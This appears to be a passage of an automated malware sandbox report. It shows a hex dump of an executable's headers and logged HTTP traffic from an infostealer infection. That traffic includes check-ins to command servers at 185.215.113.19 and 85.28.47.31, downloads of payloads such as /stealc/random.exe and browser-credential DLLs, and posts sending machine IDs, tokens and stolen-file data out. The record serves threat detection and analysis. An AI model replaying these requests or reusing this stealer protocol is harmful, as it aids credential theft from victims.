00 40 00 00 e0 6c 79 62 66 63 66 66 76 00 c0 1a 00 00 70 32 00 00 c0 1a 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 6d 63 68 69 72 7a 7a 00 10 00 00 00 30 4d 00 00 04 00 00 00 b2 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 40 4d 00 00 22 00 00 00 b6 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 27 Jul 2024 03:39:25 GMTContent-Type: application/octet-streamContent-Length: 1879552Last-Modified: Sat, 27 Jul 2024 03:10:02 GMTConnection: keep-aliveETag: "66a4650a-1cae00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 be 40 a2 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e6 04 00 00 ca 01 00 00 00 00 00 00 90 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 4a 00 00 04 00 00 f2 5e 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 72 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 30 2a 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 69 6e 79 6f 62 6a 6e 00 a0 19 00 00 e0 30 00 00 94 19 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 76 65 6f 71 70 71 75 00 10 00 00 00 80 4a 00 00 04 00 00 00 88 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 90 4a 00 00 22 00 00 00 8c 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: GET /stealc/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 31 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000016001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECBGCBGCAFIIECBFIDHIHost: 85.28.47.31Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 38 39 37 46 39 41 35 35 33 43 36 32 35 30 37 32 38 36 39 35 38 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 69 6c 61 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 2d 2d 0d 0a Data Ascii: ------ECBGCBGCAFIIECBFIDHIContent-Disposition: form-data; name="hwid"5897F9A553C62507286958------ECBGCBGCAFIIECBFIDHIContent-Disposition: form-data; name="build"sila------ECBGCBGCAFIIECBFIDHI--
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDAAKJJDAAKFHJKJKFCHost: 85.28.47.31Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 33 30 31 30 66 66 31 62 34 63 64 65 36 34 63 30 66 36 35 34 32 33 38 31 65 61 36 39 65 61 38 33 61 36 33 35 65 63 39 37 36 65 66 61 36 66 62 39 66 39 34 34 38 66 37 66 35 35 65 39 37 38 35 34 30 63 39 32 61 61 33 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 43 2d 2d 0d 0a Data Ascii: ------BGDAAKJJDAAKFHJKJKFCContent-Disposition: form-data; name="token"a3010ff1b4cde64c0f6542381ea69ea83a635ec976efa6fb9f9448f7f55e978540c92aa3------BGDAAKJJDAAKFHJKJKFCContent-Disposition: form-data; name="message"browsers------BGDAAKJJDAAKFHJKJKFC--
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFCBAEHCAEGDHJKFHJKFHost: 85.28.47.31Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 33 30 31 30 66 66 31 62 34 63 64 65 36 34 63 30 66 36 35 34 32 33 38 31 65 61 36 39 65 61 38 33 61 36 33 35 65 63 39 37 36 65 66 61 36 66 62 39 66 39 34 34 38 66 37 66 35 35 65 39 37 38 35 34 30 63 39 32 61 61 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 2d 2d 0d 0a Data Ascii: ------KFCBAEHCAEGDHJKFHJKFContent-Disposition: form-data; name="token"a3010ff1b4cde64c0f6542381ea69ea83a635ec976efa6fb9f9448f7f55e978540c92aa3------KFCBAEHCAEGDHJKFHJKFContent-Disposition: form-data; name="message"plugins------KFCBAEHCAEGDHJKFHJKF--
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGDAEBGIDBGHIECBGHJDHost: 85.28.47.31Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 44 41 45 42 47 49 44 42 47 48 49 45 43 42 47 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 33 30 31 30 66 66 31 62 34 63 64 65 36 34 63 30 66 36 35 34 32 33 38 31 65 61 36 39 65 61 38 33 61 36 33 35 65 63 39 37 36 65 66 61 36 66 62 39 66 39 34 34 38 66 37 66 35 35 65 39 37 38 35 34 30 63 39 32 61 61 33 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 41 45 42 47 49 44 42 47 48 49 45 43 42 47 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 41 45 42 47 49 44 42 47 48 49 45 43 42 47 48 4a 44 2d 2d 0d 0a Data Ascii: ------EGDAEBGIDBGHIECBGHJDContent-Disposition: form-data; name="token"a3010ff1b4cde64c0f6542381ea69ea83a635ec976efa6fb9f9448f7f55e978540c92aa3------EGDAEBGIDBGHIECBGHJDContent-Disposition: form-data; name="message"fplugins------EGDAEBGIDBGHIECBGHJD--
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAAAKJDAAFBAAKEBAAKFHost: 85.28.47.31Content-Length: 6851Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 31 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000017001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/sqlite3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIEBKEHCAKFCBFIDAAKHost: 85.28.47.31Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKFCFHJDBKKFHIEHIDGHost: 85.28.47.31Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFIJKKKKKFCAAAAFBKFHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 46 49 4a 4b 4b 4b 4b 4b 46 43 41 41 41 41 46 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 33 30 31 30 66 66 31 62 34 63 64 65 36 34 63 30 66 36 35 34 32 33 38 31 65 61 36 39 65 61 38 33 61 36 33 35 65 63 39 37 36 65 66 61 36 66 62 39 66 39 34 34 38 66 37 66 35 35 65 39 37 38 35 34 30 63 39 32 61 61 33 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 49 4a 4b 4b 4b 4b 4b 46 43 41 41 41 41 46 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 49 4a 4b 4b 4b 4b 4b 46 43 41 41 41 41 46 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 49 4a 4b 4b 4b 4b 4b 46 43 41 41 41 41 46 42 4b 46 2d 2d 0d 0a Data Ascii: ------HCFIJKKKKKFCAAAAFBKFContent-Disposition: form-data; name="token"a3010ff1b4cde64c0f6542381ea69ea83a635ec976efa6fb9f9448f7f55e978540c92aa3------HCFIJKKKKKFCAAAAFBKFContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------HCFIJKKKKKFCAAAAFBKFContent-Disposition: form-data; name="file"------HCFIJKKKKKFCAAAAFBKF--
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKJDGIEHCAEHIEBFBKKKHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 49 45 48 43 41 45 48 49 45 42 46 42 4b 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 33 30 31 30 66 66 31 62 34 63 64 65 36 34 63 30 66 36 35 34 32 33 38 31 65 61 36 39 65 61 38 33 61 36 33 35 65 63 39 37 36 65 66 61 36 66 62 39 66 39 34 34 38 66 37 66 35 35 65 39 37 38 35 34 30 63 39 32 61 61 33 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 49 45 48 43 41 45 48 49 45 42 46 42 4b 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 49 45 48 43 41 45 48 49 45 42 46 42 4b 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 49 45 48 43 41 45 48 49 45 42 46 42 4b 4b 4b 2d 2d 0d 0a Data Ascii: ------AKJDGIEHCAEHIEBFBKKKContent-Disposition: form-data; name="token"a3010ff1b4cde64c0f6542381ea69ea83a635ec976efa6fb9f9448f7f55e978540c92aa3------AKJDGIEHCAEHIEBFBKKKContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------AKJDGIEHCAEHIEBFBKKKContent-Disposition: form-data; name="file"------AKJDGIEHCAEHIEBFBKKK--
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/freebl3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/mozglue.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/msvcp140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/nss3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/softokn3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
